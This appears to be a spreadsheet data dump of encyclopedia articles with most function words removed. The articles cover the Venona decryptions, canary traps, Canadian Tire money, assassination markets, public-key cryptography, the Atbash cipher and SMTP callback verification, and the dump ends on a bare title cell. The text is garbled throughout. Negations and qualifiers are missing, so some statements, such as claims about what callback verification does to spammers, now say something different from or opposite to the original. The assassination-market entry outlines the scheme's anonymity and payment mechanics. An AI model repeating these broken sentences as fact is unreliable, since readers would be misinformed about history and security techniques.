damaging, access venona project briefings. when philby learned venona 1949, obtained advance warning fellow soviet donald maclean danger exposed. told philby agent cryptonymed "homer", whose 1945 message moscow decoded. sent york origins british embassy washington, philby, would known maclean's cryptonym, deduced sender's identity. early 1951, philby knew u.s. intelligence would soon also conclude maclean sender, advised moscow extract maclean. this maclean burgess' flight 1951 moscow, lived remainder lives. soviet espionage australia addition british american operatives, australians collected venona intercepts remote base outback. soviets remained unaware base late 1950.the founding australian security intelligence organisation (asio) labor prime minister chifley 1949 considered highly controversial within chifley's party. until then, left-leaning australian labor party hostile domestic intelligence agencies civil-liberties grounds labor government founding seemed surprising about-face. presentation venona material chifley, revealing evidence soviet agents operating australia, brought about. well australian diplomat suspects abroad, venona revealed walter seddon clayton (cryptonym "klod"), leading official within communist party australia (cpa), chief organiser soviet intelligence gathering australia. investigation revealed clayton formed underground network within party could continue operate banned. 1950, george ronald richards appointed asio's deputy-director operations venona, based sydney, charged investigating intelligence uncovered eleven australians identified cables decoded. continued venona-related work london november 1952 went lead operation cabin high-profile 1953–1954 defection australia soviet vladimir petrov. public disclosure much history, knowledge venona restricted even highest levels government. senior army officers, consultation cia, made decision restrict knowledge venona within government (even made active partner 1952). army chief staff omar bradley, concerned white house's history leaking sensitive information, decided deny president truman direct knowledge project. president received substance material fbi, justice department, reports counterintelligence intelligence matters. told material came decoded soviet ciphers. degree secrecy counter-productive; truman distrustful head edgar hoover suspected reports exaggerated political purposes. some earliest detailed public knowledge soviet code messages world broken came release chapman pincher's book, secret long, 1984. robert lamphere's book, fbi-kgb war, released 1986. lamphere liaison code-breaking activity, considerable knowledge venona counter-intelligence work resulted however, first detailed account venona project, identifying name making clear long-term implications post-war espionage, contained assistant director peter wright's 1987 memoir, spycatcher. many inside argued internally time come publicly release details venona project, 1995 bipartisan commission government secrecy, senator moynihan chairman, released venona project materials. moynihan wrote: "[the] secrecy system systematically denied american historians access records american history. late find relying archives former soviet union moscow resolve questions going washington mid-century. venona intercepts contained overwhelming proof activities soviet networks america, complete names, dates, places, deeds." considerations releasing venona translations privacy interests individuals mentioned, referenced, identified translations. some names released would constitute invasion privacy. however, least case, independent researchers identified subjects whose name obscured nsa. dearth reliable information available public—or even president congress—may helped polarize debates 1950s extent danger soviet espionage united states. anti-communists suspected many spies remained large, perhaps including known government. those criticized governmental non-governmental efforts root expose communists felt efforts overreaction addition reservations mccarthyism). public access—or broader governmental access—to venona evidence would certainly affected debate, affecting retrospective debate among historians others now. moynihan commission wrote final report: balanced history period beginning appear; venona messages surely supply great cache facts bring matter closure. time, american government, much less american public, confronted possibilities charges, baffling terrifying." national cryptologic museum features exhibit venona project "cold war/information age" gallery. texas textbook controversy controversy arose 2009 texas state board education's revision high school history class curricula suggest venona shows senator joseph mccarthy justified zeal exposing believed soviet spies communist sympathizers. critics emory university history professor harvey klehr assert people organizations identified mccarthy, brought forward army-mccarthy hearings rival politicians democratic party, mentioned venona content accusations remain largely unsupported evidence. critical views majority historians convinced historical value venona material. intelligence historian nigel west believes "venona remain[s] irrefutable resource, reliable mercurial recollections defectors dubious conclusions drawn paranoid analysts mesmerized machiavellian plots." however, number writers scholars taken critical view translations. they question accuracy translations identifications covernames translations give. writers walter miriam schneir, lengthy 1999 review first book-length studies messages, object book's overconfidence translations' accuracy, noting undecrypted gaps texts make interpretation difficult, emphasizing problem identifying individuals mentioned covernames. support critique, cite declassified memorandum, written 1956 belmont, assistant director edgar hoover time. memo, belmont discusses possibility using venona translations court prosecute soviet agents, comes strongly opposed use. reasons include legal uncertainties admissibility translations evidence, difficulties prosecution would face supporting validity translations. belmont highlights uncertainties translation process, noting cryptographers indicated "almost anything included translation deciphered messages future radically revised." also notes complexities identifying people covernames, describing personal details mentioned covername "antenna" person, investigative process required finally connect "antenna" julius rosenberg. schneirs conclude reader faced venona's incomplete, disjointed messages easily arrive badly skewed impression."many critiques venona translations based specific cases. schneirs' critique venona documents based decades work case ethel julius rosenberg. another critique venona translations came late rutgers university professor john lowenthal, student worked volunteer alger hiss's defense team, later wrote extensively hiss case. lowenthal's critique focused message (venona 1822 washington-moscow march 1945), comments identified covername 'ales' "probably alger hiss." lowenthal raised number objections identification, rejecting conclusion psychologically motivated politically correct factually wrong." lowenthal's article extended debate 'ales' message, even prompted declassify original russian text. currently, venona 1822 message complete decrypted russian text published. victor navasky, editor publisher nation, also written several editorials highly critical john earl haynes' harvey klehr's interpretation recent work subject soviet espionage. navasky claims venona material used "distort understanding cold war" files potential "time bombs misinformation." commenting list americans identified venona, published appendix venona: decoding soviet espionage america, navasky wrote, "the reader left implication—unfair unproven—that every name list involved espionage, result, otherwise careful historians mainstream journalists routinely refer venona proof many hundreds americans part network." navasky goes defense listed people claimed great deal so-called espionage went nothing "exchanges information among people good will" "most exchanges innocent within law."according historian ellen schrecker, "because offer insights world secret police sides iron curtain, tempting treat venona materials less critically documents accessible sources. many gaps record materials complete confidence." schrecker believes documents established guilt many prominent figures, still critical views scholars john earl haynes, arguing, "complexity, nuance, willingness world black white seem alien haynes' view history." also elizabeth bentley history soviet russian espionage united states list americans venona papers list soviet agents united states russian state archive socio-political history notes references reading external links media related venona project wikimedia commons venona documents national security agency</t>
  </si>
  <si>
    <t>Canary trap</t>
  </si>
  <si>
    <t>canary trap method exposing information leak giving different versions sensitive document several suspects seeing version gets leaked. could false statement, whether sensitive information gets people well. special attention paid quality prose unique language, hopes suspect repeat verbatim leak, thereby identifying version document. term coined clancy novel patriot games, although clancy invent technique. actual method (usually referred barium meal test espionage circles) used intelligence agencies many years. fictional character jack ryan describes technique devised identifying sources leaked classified documents: each summary paragraph different versions, mixture paragraphs unique numbered copy paper. there thousand possible permutations, ninety-six numbered copies actual document. reason summary paragraphs lurid entice reporter quote verbatim public media. quotes something three paragraphs, know copy and, therefore, leaked refinement technique uses thesaurus program shuffle synonyms, thus making every copy document unique. known canary trap cases following troubled production star trek: motion picture late 1970s, paramount pictures effectively replaced gene roddenberry producer movies franchise harve bennett. roddenberry retained "executive consultant", high regard series' fans held little real authority still kept involved creative process. fans often complained particular plot developments proposed films, death spock star trek roddenberry opposed. drafts screenplay star trek iii: search spock circulated, bennett arranged individual copy subtle clues distinguishing others. shortly roddenberry opposed destruction enterprise climax film, fans began complain paramount bennett. found leaked copy script given roddenberry, unable anything it.after series leaks tesla motors 2008, elon musk reportedly sent slightly different versions e-mail employee attempt reveal potential leakers. e-mail disguised request employees sign non-disclosure agreement. plan undermined company's general counsel forwarded unique version e-mail attached agreement. result, musk's scheme realized employees safe copy leak.in 2017, proposed method trump administration catch leaks.in october 2019, british celebrity coleen rooney used technique identify leaking information private instagram stories tabloid newspaper posting fake stories blocked account. when details appeared press, publicly identified leaks coming account rebekah vardy, wife footballer jamie vardy. subsequent libel trial became known wagatha christie case.in december 2020, andrew lewer, member parliament parliamentary private secretary government, fired canary trap form letter reminding staff leak published website guido fawkes. barium meal test according book spycatcher peter wright (published 1987), technique standard practice used (and intelligence agencies) many years, name "barium meal test". barium meal test sophisticated canary trap flexible take many different forms. however, basic premise reveal supposed secret suspected enemy (but nobody else) monitor whether evidence fake information utilised side. example, suspected double agent could offered tempting "bait": e.g., told important information stored dead drop site. fake dead drop site could periodically checked signs disturbance. site showed signs disturbed (for instance, order copy microfilm stored there), would confirm suspected enemy really enemy, i.e., double agent. embedding information technique embedding significant information hidden form medium used many ways, usually classified according intent: watermarks used show items authentic forged. steganography used hide secret message apparently innocuous message, order escape detection. canary trap hides information document uniquely identifies copies traced. screener versions dvds often marked allow tracking unauthorised releases source. star trek incident, major films television productions frequently give scripts cast crew lines different individual version. thus entire script copied leaked public, producers track specific person leaked script. practice prevent generalized information script leaked, discourage leaking verbatim copies script itself. trap streets maps, intentionally fictitious streets, sometimes included track copyright violations might republish copyrighted maps illegally. spurious words sometimes included dictionaries detect publishers copying them. oxford english dictionary contains appendix words edition dictionary first used first duplicated them. zero-width spaces unicode characters visually rendered. arbitrary number characters inserted letters word. though visible, typically persist even word copied pasted transmitted multiple times. this used create persistent, invisible fingerprints digital text. mailing lists purchase typically seeded small number postal e-mail addresses route back seller list. this used detect re-use list (typically sold per-mailing basis) resale list (usually prohibited). popular culture canary trap used several clancy's novels. chronologically first appears without remorse, official alters report given senator, revealing internal leak giving information kgb. different versions report given suspected leakers. barium meals also administered robert littel's book company, later miniseries name. technique (not named) used 1970s television serial 1990. unnamed technique also appeared irving wallace's book word (1972), 1985 novel london match deighton. variation canary trap used film miami vice, various rendezvous dates leaked different groups. third-season finale mentalist, characters canary trap (giving different hotel room numbers different suspects) uncover mole within agency. similar ruse used series ashes ashes. clash kings, second book song fire series, tyrion lannister uses trap find member king's small council reporting sister, queen regent cersei lannister. grand maester pycelle, tells plot marry niece, princess myrcella, prince trystane powerful house martell, dorne. littlefinger, claims instead send myrcella raised lysa arryn married robert. varys, says plan send nephew tommen martells. when cersei confronts him, knows plan send myrcella dorne, tyrion knows pycelle leak. this plotline also depicted "what dead never die", second season game thrones, television adaptation books. when distributing film broken friends, trent reznor claims watermarked tapes dropouts certain points could identify leak would surface. film heat starring melissa mccarthy sandra bullock, canary trap employed drug ring decide loyalty returning member detective mullins' brother. solo stars' end, first book solo adventures, title character uses canary trap find traitor murderer among passengers. tells target different planet, false, knowing traitor would learned real destination killed group's leader. also warrant canary method indirect notification subpoena recruitment spies, also known clandestine humint asset recruiting coded anti-piracy fictitious entry deliberately incorrect entry reference work honeytoken machine identification code, also known printer steganography digital watermark certain printers leave traitor tracing watermark identification paper prevent counterfeiting references external links fingerprinting archived 2016-03-15 wayback machine gives good overview different kinds canary trap techniques. eff.org docucolor tracking decoding guide read date, time, printer serial number forensic tracking codes xerox docucolor color laser printout.</t>
  </si>
  <si>
    <t>Canadian Tire money</t>
  </si>
  <si>
    <t>canadian tire money, officially canadian tire 'money' ctm, loyalty program operated canadian retail chain canadian tire. consists coupons, issued company, resemble real banknotes. used scrip canadian tire stores, considered private currency. notes printed paper similar canadian currency printed still paper, jointly produced country's long-established security printers, british american banknote company (babn) canadian bank note company (cbn). some privately owned businesses canada accept payment (see history below), since owners many businesses shop canadian tire. canadian tire stores, accepted canadian money par, canadian tire dollar canadian dollar. april 2018, canadian tire announced would shifting triangle rewards, card based rewards program. paper canadian tire money continues issued accepted alongside program. history dynamics recognizable facet featured face bill. according canadian tire representatives, fictional character represented referred "sandy mctire" sports shanter stylized waxed moustache. based specific individual assumed represent thrifty scotsman, 1950s everyman blue-collar canada. introduced 1958, inspired muriel billes, wife canadian tire's co-founder first president, alfred billes, response promotional giveaways many companies offered time. available canadian tire bars successful that, 1961, extended retail stores well, become successful loyalty program canadian retail history. print 'notes' refers "money bonus coupons". canadian tire money given purchases paid cash debit, based pre-tax total, excluding labour shop supplies costs. initial coupon rate earned eligible purchase price, lowered 1.4%, 0.4%. customers canadian tire money anything store. (older coupons state redeemable canadian tire stores stations; however, coupons produced least last years lack wording therefore redeemable stores only.) also used cover sales purchases, since accepted cash taxes calculated. also, even purchase made entirely coupons, also considered cash purchase coupons calculated paid out. ontario, retail sales bulletins state "coupon must reimbursed franchisee". submitting merchants, merchants essence breaking ontario failed include discount value goods calculated taxed. some merchants accepting canadian tire money discount, calculating remitting sales taxes, required law, getting fined practice; ongoing issue. 2012, canadian tire began pilot program make money "plastic", make manageable trackable loyalty program. plastic loyalty card earn points twice rate traditional paper money. according customer service july 2017, rate purchases made canadian tire "options" card in-store products reward rate purchases stores 0.8%. denominations 1958, five different denominations (composed cents, cents, cents, cents, issued. revision 1962 included introduction four lower values cents), higher denominations, including cents. sequence denominations introduced 1985 including cents, cents, cents, cents, cents, cents, note added 1989, cents dropped 1991.ctm coupons produced denominations cents, well dollars. addition, canadian tire money earned electronically canadian tire credit cards canadian tire triangle mastercard. latter used wherever mastercard accepted earns canadian tire money matter used make purchase, anywhere world. treated real currency franchise cannot directly exchanged real canadian currency customers. item bought canadian tire money returned customer receives either canadian tire money back given amount gift card. item bought cash card returned refund, customer receives refund less value issued item unless also returned. december 2009, part advertised deal, canadian tire handed first canadian tire coin, redeemable purchase least merchandise. another similar deal followed 2010 (coinciding 2010 olympic winter games), three-coin winter collection. coins spent manner conventional ctm. usage beyond canadian tire late 2004 moncton, brunswick, several customers canadian imperial bank commerce dispensed total bills canadian tire money instead real bills. they compensated bank.culturally, canadian tire money sometimes referred comedians: perhaps national version "monopoly money", perhaps invoking pejorative comparison value canadian dollars u.s. dollars, perhaps misunderstood exotic element canadian society (e.g. james's comedic reference person depicted bill "our king"). 2009 trailer park boys movie countdown liquor day, lahey offers julian $700 canadian tire money trailer.in mid-1990s, germany caught million counterfeit canadian tire money. recovered left canada redeem it.in 2012, musician corin raymond funded album paper nickels partially fundraising campaign inviting fans donate unused canadian tire money. special issuances commemorative cent note released company june july 2017 celebrate 150th anniversary confederation canada 1867 part national festivities. also canadian tire bank triangle rewards loyalty program numismatics banknote references external links canadian tire 'money' select 1958 expand dash symbol history, canadian tire website.</t>
  </si>
  <si>
    <t>Assassination market</t>
  </si>
  <si>
    <t>assassination market prediction market party place (using anonymous electronic money pseudonymous remailers) date death given individual, collect payoff "guess" date accurately. this would incentivise assassination individuals assassin, knowing action would take place, could profit making accurate time subject's death. because payoff accurately picking date rather performing action assassin, substantially difficult assign criminal liability assassination. history early uses terms "assassination market" "market assassinations" found positive negative lights) 1994's "the cyphernomicon" timothy may, cypherpunk. concept potential effects also referred assassination politics, term popularized bell 1995–96 essay name.early part bell describes idea organization manage system could, presumably, make list people seriously violated (non-aggression principle), would justice courts fact actions done behest government. associated name would dollar figure, total amount money organization received contribution, amount would give correctly "predicting" person's death, presumably naming exact date. "guessers" would formulate "guess" file, encrypt organization's public key, transmit organization, possibly using methods untraceable putting floppy disk envelope tossing mailbox, likely either cascade encrypted anonymous remailers, possibly public-access internet locations, terminals local library, etc. order prevent system becoming simply random unpaid lottery, people randomly guess name date (hoping lightning would strike, occasionally does), would necessary deter random guessing requiring "guessers" include "guess" encrypted untraceable "digital cash," amount sufficiently high make random guessing impractical. bell goes specify protocol assassination market detail. final part essay, bell posits market largely non-anonymous. contrasts version previously described. carl johnson's attempt popularise concept assassination politics appeared rely earlier version. there followed attempt popularise second 2001 ongoing today.technologies like bitcoin enabled online assassination markets described parts nine assassination politics. assassination market website first prediction market entitled 'assassination market' created self-described crypto-anarchist 2013. utilising hide site's location bitcoin based bounties prediction technology, site lists bounties president barack obama, economist bernanke former justice minister sweden beatrice ask. 2015 site suspected defunct, deposited bitcoins cashed 2018. also dark darknet market dead pool policy analysis market tontinepopular culturethe assassination bureau, ltd, unfinished novel jack london visit "hated nation", episode black mirror ankh-morpork assassins' guild references further reading external links bell's assassination politics essay internet archive (mirror) usenet discussion containing initial publication first part assassination politics google groups academic discussion assassination markets anarchist perspective internet archive</t>
  </si>
  <si>
    <t>Asymmetric cryptosystem</t>
  </si>
  <si>
    <t>public-key cryptography, asymmetric cryptography, cryptographic system uses pairs keys. each pair consists public (which known others) private (which known anyone except owner). generation pairs depends cryptographic algorithms based mathematical problems termed one-way functions. effective security requires keeping private private; public openly distributed without compromising security.in system, person encrypt message using intended receiver's public key, encrypted message decrypted receiver's private key. this allows, instance, server program generate cryptographic intended suitable symmetric-key cryptography, client's openly-shared public encrypt newly generated symmetric key. server send encrypted symmetric insecure channel client; client decrypt using client's private (which pairs public used server encrypt message). with client server symmetric key, safely symmetric encryption (likely much faster) communicate otherwise-insecure channels. this scheme advantage manually pre-share symmetric keys fundamentally difficult problem) gaining higher data throughput advantage symmetric-key cryptography. with public-key cryptography, robust authentication also possible. sender combine message private create short digital signature message. anyone sender's corresponding public combine message claimed digital signature; signature matches message, origin message verified (i.e., must made owner corresponding private key).public algorithms fundamental security primitives modern cryptosystems, including applications protocols offer assurance confidentiality, authenticity non-repudiability electronic communications data storage. they underpin numerous internet standards, transport layer security (tls), ssh, s/mime pgp. some public algorithms provide distribution secrecy (e.g., diffie–hellman exchange), provide digital signatures (e.g., digital signature algorithm), provide (e.g., rsa). compared symmetric encryption, asymmetric encryption rather slower good symmetric encryption, slow many purposes. today's cryptosystems (such tls, secure shell) symmetric encryption asymmetric encryption, often using asymmetric encryption securely exchange secret used symmetric encryption. description before mid-1970s, cipher systems used symmetric algorithms, cryptographic used underlying algorithm sender recipient, must keep secret. necessity, every system exchanged communicating parties secure prior system instance, secure channel. this requirement never trivial rapidly becomes unmanageable number participants increases, secure channels available, when, sensible cryptographic practice), keys frequently changed. particular, messages meant secure users, separate required possible pair users. contrast, public system, public keys disseminated widely openly, corresponding private keys need kept secret owner. best-known uses public cryptography are: public encryption, message encrypted intended recipient's public key. properly chosen used algorithms, messages cannot practice decrypted anyone possess matching private key, thus presumed owner person associated public key. this used ensure confidentiality message. digital signatures, message signed sender's private verified anyone access sender's public key. this verification proves sender access private key, therefore likely person associated public key. also proves signature prepared exact message, since verification fail message could devise without using private key.one important issue confidence/proof particular public authentic, i.e. correct belongs person entity claimed, tampered replaced (perhaps malicious) third party. there several possible approaches, including: public infrastructure (pki), third parties known certificate authorities certify ownership pairs. relies upon this. this implies system (software, hardware, management) trust-able involved. "web trust" decentralizes authentication using individual endorsements links user public belonging user. uses approach, addition lookup domain name system (dns). dkim system digitally signing emails also uses approach. applications obvious application public encryption system encrypting communication provide confidentiality message sender encrypts using recipient's public decrypted recipient's paired private key. another application public cryptography digital signature. digital signature schemes used sender authentication. non-repudiation systems digital signatures ensure party cannot successfully dispute authorship document communication. further applications built foundation include: digital cash, password-authenticated agreement, time-stamping services non-repudiation protocols. hybrid cryptosystems because asymmetric algorithms nearly always much computationally intensive symmetric ones, common public/private asymmetric key-exchange algorithm encrypt exchange symmetric key, used symmetric-key cryptography transmit data using now-shared symmetric symmetric encryption algorithm. pgp, ssh, ssl/tls family schemes procedure; thus called hybrid cryptosystems. initial asymmetric cryptography-based exchange share server-generated symmetric server client advantage requiring symmetric pre-shared manually, printed paper discs transported courier, providing higher data throughput symmetric cryptography asymmetric cryptography remainder shared connection. weaknesses security-related systems, important identify potential weaknesses. aside poor choice asymmetric algorithm (there widely regarded satisfactory) short length, chief security risk private pair becomes known. security messages, authentication, etc., lost. algorithms public schemes theory susceptible "brute-force search attack". however, attack impractical amount computation needed succeed termed "work factor" claude shannon reach potential attackers. many cases, work factor increased simply choosing longer key. algorithms inherently much lower work factors, making resistance brute-force attack (e.g., longer keys) irrelevant. some special specific algorithms developed attacking public encryption algorithms; elgamal encryption known attacks much faster brute-force approach. none sufficiently improved actually practical, however. major weaknesses found several formerly promising asymmetric algorithms. "knapsack packing" algorithm found insecure development attack. cryptographic functions, public-key implementations vulnerable side-channel attacks exploit information leakage simplify search secret key. these often independent algorithm used. research underway discover, protect against, attacks. alteration public keys another potential security vulnerability using asymmetric keys possibility "man-in-the-middle" attack, communication public keys intercepted third party (the "man middle") modified provide different public keys instead. encrypted messages responses must, instances, intercepted, decrypted, re-encrypted attacker using correct public keys different communication segments avoid suspicion. communication said insecure data transmitted manner allows interception (also called "sniffing"). these terms refer reading sender's private data entirety. communication particularly unsafe interceptions can't prevented monitored sender.a man-in-the-middle attack difficult implement complexities modern security protocols. however, task becomes simpler sender using insecure media public networks, internet, wireless communication. cases attacker compromise communications infrastructure rather data itself. hypothetical malicious staff member internet service provider (isp) might find man-in-the-middle attack relatively straightforward. capturing public would require searching gets sent isp's communications hardware; properly implemented asymmetric schemes, significant risk. advanced man-in-the-middle attacks, side communication original data receive malicious variant. asymmetric man-in-the-middle attacks prevent users realizing connection compromised. this remains even user's data known compromised data appears fine user. this lead confusing disagreements users must end!" neither user fault. hence, man-in-the-middle attacks fully preventable communications infrastructure physically controlled parties; wired route inside sender's building. summation, public keys easier alter communications hardware used sender controlled attacker. public infrastructure approach prevent attacks involves public infrastructure (pki); roles, policies, procedures needed create, manage, distribute, use, store revoke digital certificates manage public-key encryption. however, potential weaknesses. example, certificate authority issuing certificate must trusted participating parties properly checked identity key-holder, ensured correctness public issues certificate, secure computer piracy, made arrangements participants check certificates protected communications begin. browsers, instance, supplied long list "self-signed identity certificates" providers used check bona fides certificate authority then, second step, certificates potential communicators. attacker could subvert certificate authorities issuing certificate bogus public could mount "man-in-the-middle" attack easily certificate scheme used all. alternative scenario rarely discussed, attacker penetrates authority's servers obtains store certificates keys (public private) would able spoof, masquerade, decrypt, forge transactions without limit. despite theoretical potential problems, approach widely used. examples include predecessor ssl, commonly used provide security browser transactions (for example, securely send credit card details online store). aside resistance attack particular pair, security certification hierarchy must considered deploying public systems. some certificate authority usually purpose-built program running server computer vouches identities assigned specific private keys producing digital certificate. public digital certificates typically valid several years time, associated private keys must held securely time. when private used certificate creation higher server hierarchy compromised, accidentally disclosed, "man-in-the-middle attack" possible, making subordinate certificate wholly insecure. examples examples well-regarded asymmetric techniques varied purposes include: diffie–hellman exchange protocol (digital signature standard), incorporates digital signature algorithm elgamal elliptic-curve cryptography elliptic curve digital signature algorithm (ecdsa) elliptic-curve diffie–hellman (ecdh) ed25519 ed448 (eddsa) x25519 x448 (ecdh/eddh) various password-authenticated agreement techniques paillier cryptosystem encryption algorithm (pkcs#1) cramer–shoup cryptosystem authenticated agreement protocolexamples asymmetric algorithms widely adopted include: ntruencrypt cryptosystem kyber mceliece cryptosystemexamples notable insecure asymmetric algorithms include: merkle–hellman knapsack cryptosystemexamples protocols using asymmetric algorithms include: s/mime gpg, implementation openpgp, internet standard emv, certificate authority ipsec zrtp, secure voip protocol transport layer security standardized ietf predecessor secure socket layer silc bitcoin off-the-record messaging history during early history cryptography, parties would rely upon would exchange means secure, non-cryptographic, method face-to-face meeting, trusted courier. this key, parties must keep absolutely secret, could used exchange encrypted messages. number significant practical difficulties arise approach distributing keys. anticipation 1874 book principles science, william stanley jevons wrote: reader numbers multiplied together produce number 8616460799? think unlikely anyone ever know. here described relationship one-way functions cryptography, went discuss specifically factorization problem used create trapdoor function. july 1996, mathematician solomon golomb said: "jevons anticipated feature algorithm public cryptography, although certainly invent concept public cryptography." classified discovery 1970, james ellis, british cryptographer government communications headquarters (gchq), conceived possibility "non-secret encryption", (now called public cryptography), could implement 1973, colleague clifford cocks implemented become known encryption algorithm, giving practical method "non-secret encryption", 1974 another gchq mathematician cryptographer, malcolm williamson, developed known diffie–hellman exchange. scheme also passed usa's national security agency. both organisations military focus limited computing power available case; potential public cryptography remained unrealised either organization: judged important military share rapidly electronically, major advantage opponent. only evolution berners-lee designing open internet architecture cern, adaptation adoption arpanet public cryptography realise full potential. —ralph benjamin these discoveries publicly acknowledged years, research declassified british government 1997. public discovery 1976, asymmetric cryptosystem published whitfield diffie martin hellman who, influenced ralph merkle's work public distribution, disclosed method public agreement. this method exchange, uses exponentiation finite field, came known diffie–hellman exchange. this first published practical method establishing shared secret-key authenticated (but confidential) communications channel without using prior shared secret. merkle's "public key-agreement technique" became known merkle's puzzles, invented 1974 published 1978. this makes asymmetric encryption rather field cryptography although cryptography dates back 2,000 years.in 1977, generalization cocks' scheme independently invented rivest, shamir leonard adleman, mit. latter authors published work 1978 martin gardner's scientific american column, algorithm came known rsa, initials. uses exponentiation modulo product large primes, encrypt decrypt, performing public encryption public digital signatures. security connected extreme difficulty factoring large integers, problem known efficient general technique (though prime factorization obtained brute-force attacks; grows much difficult larger prime factors are). description algorithm published mathematical games column august 1977 issue scientific american.since 1970s, large number variety encryption, digital signature, agreement, techniques developed, including rabin cryptosystem, elgamal encryption, elliptic curve cryptography. also notes references external links oral history interview martin hellman, charles babbage institute, university minnesota. leading cryptography scholar martin hellman discusses circumstances fundamental insights invention public cryptography collaborators whitfield diffie ralph merkle stanford university mid-1970s. account gchq kept invention secret 1997</t>
  </si>
  <si>
    <t>Atbash</t>
  </si>
  <si>
    <t>atbash (hebrew: אתבש; also transliterated atbaš) monoalphabetic substitution cipher originally used encrypt hebrew alphabet. modified known writing system standard collating order. encryption atbash cipher particular type monoalphabetic cipher formed taking alphabet abjad, syllabary, etc.) mapping reverse, first letter becomes last letter, second letter becomes second last letter, example, latin alphabet would work like this: fact perform this, atbash cipher provides communications security, lacks sort key. multiple collating orders available, used encryption used key, provide significantly security, considering letters give away used. history name derives first, last, second, second last hebrew letters (aleph–taw–bet–shin). atbash cipher modern hebrew alphabet would bible several biblical words described commentators examples atbash: jeremiah 25:26 "the king sheshach shall drink them" sheshach meaning babylon atbash (בבל‎ ששך‎ ššk). jeremiah 51:1 "behold, raise babylon, inhabitants lev-kamai, destroying wind." lev-kamai meaning chaldeans (כשדים‎ kšdym לבקמי‎ lbqmy). jeremiah 51:41 "how sheshach captured! praise whole earth taken! babylon become curse among nations!" sheshach meaning babylon (בבל‎ ששך‎ ššk).regarding potential atbash switch single letter: exodus 20:24 "any place mention name" (אזכיר‎) "any place mention name" (תזכיר‎) according asevilli relationship affine cipher atbash cipher seen special case affine cipher. under standard affine convention, alphabet letters mapped numbers (the hebrew alphabet standard latin alphabet 26). atbash cipher enciphered deciphered using encryption function affine cipher setting {\displaystyle \mathrm (x)=\mathrm (x)={\big (}(m-1)x+(m-1){\big )}{\bmod {m}}.} this simplified {\displaystyle {\begin{aligned}\mathrm (x)&amp;=(m-1)(x+1){\bmod {m}}\\&amp;=-(x+1){\bmod {m}}.\end{aligned}}} instead, letters alphabet mapped ..., encryption decryption function atbash cipher becomes {\displaystyle \mathrm (x)=(-x{\bmod {m}})+1.} also temurah (kabbalah) gematria hebrew language rot13 notes references paul hoskisson. "jeremiah's game". insights. archived original july 2013. retrieved march 2013. external links online atbash decoder</t>
  </si>
  <si>
    <t>Callback verification</t>
  </si>
  <si>
    <t>callback verification, also known callout verification sender address verification, technique used smtp software order validate e-mail addresses. common target verification sender address message envelope (the address specified smtp dialogue "mail from"). mostly used anti-spam measure. purpose since large percentage e-mail spam generated forged sender ("mfrom") addresses, spam detected checking whether forging resulted invalid address, using method. related technique "call forwards", secondary firewall mail exchanger verify recipients primary mail exchanger domain order decide whether address deliverable. process receiving mail server verifies sender address, verifying parts sender address domain name (part character), local part (part character). first step establish successful smtp connection mail exchanger sender address. mail exchanger found looking records domain's zone. second step query exchanger, make sure accepts address valid one. this done sending email address, however process stopped mail exchanger accepts rejects recipient address. these steps receiving mail server would take bounce mail back sender, however case mail sent. smtp commands sent are: helo verifier host name mail from:&lt;&gt; rcpt to:&lt;the address tested&gt; quit equivalently, mail from rcpt commands replaced vrfy command, however vrfy command required supported usually disabled modern mtas. both techniques technically compliant relevant smtp rfcs (rfc 5321), however 2505 best current practice) recommends, default, disabling vrfy command prevent directory harvest attacks. (one widespread interpretation implies mail from/rcpt pair commands also respond way, stated rfcs.) disadvantages callback verification abusive lead blocklisting server, domain block. admin mail server disabled vrfy, using rcpt circumvent unauthorized access attempt evade access controls. such, operator vulnerable civil criminal prosecution, depending jurisdiction. limitations documentation postfix exim caution technique mention many limitations smtp callbacks. particular, many situations either ineffective causes problems systems receive callbacks. some regular mail exchangers give useful results callbacks: servers reject bounce mails (contrary 1123, part work around problem, postfix, example, uses either local postmaster address address "double-bounce" mail from part callout. this workaround, however, problems: first, cause verification loop; secondly fail bounce address validation used reduce backscatter. work around used. callback verification still work rejecting bounces happens data stage instead earlier mail from stage, rejecting invalid e-mail addresses remains rcpt stage instead also moved data stage. servers accept e-mail address rcpt stage reject invalid ones data stage. this commonly done order prevent directory harvest attacks will, design, give information whether e-mail address valid thus prevent callback verification working. servers accept mails smtp dialogue (and generate bounces later). this problem alleviated testing random non-existent address well desired address test succeeds, verification useless). servers implement catch-all e-mail will, definition, consider e-mail addresses valid accept them. like systems accept-then-bounce, random non-existent address detect this. callback process cause delays delivery mail server address verified slow anti-spam techniques, including "greet delays" (causing connection delay) greylisting (causing verification deferral). system called back uses greylisting callback return useful information greylisting time expired. greylisting works returning "temporary failure" response code) sees unfamiliar mail from/rcpt pair email addresses. greylisting system give "permanent failure" response code) given invalid e-mail address rcpt instead continue return response code. some e-mail legitimate valid "envelope from" address user error misconfiguration. positive aspect verification process usually cause outright rejection, sender spammer real user, notified problem. server receives spam callbacks. addresses invalid spamtrap, server look similar spammer dictionary attack harvest addresses. this turn might server blacklisted elsewhere. some administrators consider callback verification unsolicited bulk e-mail (ube), block originating smtp client, report spam, dnsbls, even backscatter volume. every callback places unasked burden system called back effective ways system avoid burden. extreme cases, spammer abuses sender address uses sufficiently diverse receiving mxs, method, might callback, overloading forged address requests (effectively distributed denial service attack). callback verification effect spammers spoof real email addresses null bounce address.some problems caused originating systems violating stretching limits rfcs; verification problems reflecting problems back senders, like unintentionally used invalid addresses, rejection null sender, greylisting (where, example, delay caused verifying recipient closely related delay caused originator). many cases turn helps originator system detect problems, (like unintentionally able receive valid bounces). several problems reduced caching verification results. particular, systems give useful information (not rejecting rcpt time, catch-all e-email, etc.) remembered future call backs systems need made. also, results (positive negative) specific e-mail addresses remembered. mtas like exim caching built references external links spamlinks: sender callout verification sender verification free software foundation</t>
  </si>
  <si>
    <t>Attribute-based encryption</t>
  </si>
  <si>
